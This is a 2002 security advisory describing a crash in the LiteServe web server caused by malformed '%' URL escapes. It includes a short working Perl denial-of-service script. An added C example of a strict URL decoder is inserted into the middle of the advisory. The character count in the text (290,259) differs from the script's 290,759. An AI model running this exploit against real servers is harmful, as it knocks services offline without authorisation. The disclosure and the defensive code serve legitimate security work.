[NT] LiteServe URL Decoding DoS

From: support@securiteam.com
Date: 11/18/02

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 18 Nov 2002 10:20:30 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      LiteServe URL Decoding DoS
    ------------------------------------------------------------------------

    SUMMARY

    LiteServe <http://www.cmfperception.com/> is a powerful, full-featured
    Web, email and FTP server. This server software is perfect for personal
    websites or commercial sites with high traffic demands and multiple
    domains. A vulnerability in the way the program decodes URLs allows remote
    attackers to cause it to crash.

    DETAILS

    LiteServe's URL decoder mishandles illegal "%xx" sequences, such as
    "%.@", and may produce corrupted output when such a sequence is used.
    The problem appears to be a referencing issue when the escape sequence
    does not specify a legitimate hexadecimal sequence. A denial of service
    may occur if LiteServe is passed an extremely large request consisting
    only of "%" characters. 290,259 such characters will cause LiteServe to
    freeze:

    GET /[buffer] HTTP/1.0

    After this request is processed, attempting to connect to the HTTP service
    reveals that the server is dead.

    Exploit:
    #!/usr/bin/perl
    # Arguments: <host> <port>
    use IO::Socket;
    # Request path made up only of "%" characters
    $buffer="%"x290759;
    $req=sprintf("GET /%s HTTP/1.0\r\n\r\n",$buffer);
    $f=IO::Socket::INET->new(PeerAddr=>$ARGV[0],PeerPort=>$ARGV[1],Proto=>"tcp");
    print $f $req;
    undef $f;
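
For the defensive side of the decoding problem described under DETAILS, the following is an added example (not code from the advisory or from LiteServe) of a percent-decoder that rejects malformed "%xx" sequences and oversized input before doing any per-byte work. The function name, status codes and the MAX_PATH_LEN value are assumptions chosen for illustration.

```c
#include <stddef.h>

#define MAX_PATH_LEN 2048  /* assumed cap on the encoded path; tune per deployment */

enum url_status { URL_TOO_LONG = -1, URL_BAD_ESCAPE = -2, URL_NUL_BYTE = -3 };

/* Value of one hex digit, or -1 if c is not in [0-9A-Fa-f]. */
static int hex_val(unsigned char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/*
 * Decode the len bytes at in into out (capacity out_cap), NUL-terminating it.
 * Returns the decoded length, or a negative url_status on rejection.
 * Decoding never expands the input, so len < out_cap guarantees room.
 */
int url_decode_strict(const char *in, size_t len, char *out, size_t out_cap)
{
    size_t i = 0, o = 0;

    if (len > MAX_PATH_LEN || len >= out_cap)
        return URL_TOO_LONG;          /* reject before touching the data */

    while (i < len) {
        unsigned char c = (unsigned char)in[i];
        if (c == '%') {
            int hi, lo;
            if (len - i < 3)          /* "%" or "%x" cut off at end of input */
                return URL_BAD_ESCAPE;
            hi = hex_val((unsigned char)in[i + 1]);
            lo = hex_val((unsigned char)in[i + 2]);
            if (hi < 0 || lo < 0)     /* e.g. "%.@" or a run of "%" */
                return URL_BAD_ESCAPE;
            c = (unsigned char)(hi << 4 | lo);
            i += 3;
        } else {
            i += 1;
        }
        if (c == '\0')                /* raw or encoded NUL would truncate C strings */
            return URL_NUL_BYTE;
        out[o++] = (char)c;
    }
    out[o] = '\0';
    return (int)o;
}
```

A server using a decoder of this shape would answer any negative return with a 400-class response instead of passing the path on.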

    ADDITIONAL INFORMATION

    The information has been provided by Matthew Murphy
    <mattmurphy@kc.rr.com>.

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.